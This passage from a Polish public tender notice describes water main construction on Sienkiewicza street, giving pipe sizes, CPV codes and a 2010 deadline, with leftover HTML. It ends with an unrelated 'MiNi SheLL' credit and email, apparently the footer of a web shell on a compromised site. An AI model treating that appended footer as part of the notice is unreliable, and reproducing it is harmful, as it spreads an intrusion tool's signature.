realizowana w ramach zadania :  Budowa kanalizacji sanitarnej i deszczowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br.Czecha, Asnyka, Ratowników Górskich, Stokowa, Budowlanych, Krótka, Wczasowa, Willowa
Zadanie nr 3. Budowa sieci wodociągowej w ul. Sienkiewicza :
- o śr. 200mm o długości ok. 337,50m,  
- o śr. 160mm o długości ok. 16,00m
- o śr. 125mm o długości ok. 2,50m
- o śr. 90mm o długości ok. 37,50m
- o śr. 63mm o długości ok. 29,00m
- o śr. 40mm o długości ok. 7,50m
realizowana w ramach zadania :  Budowa sieci wodociągowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br. Czecha, Asnyka, Krótka, Wczasowa, Willowa, Zakopiańska i Strażacka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.20.00-2, 45.23.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com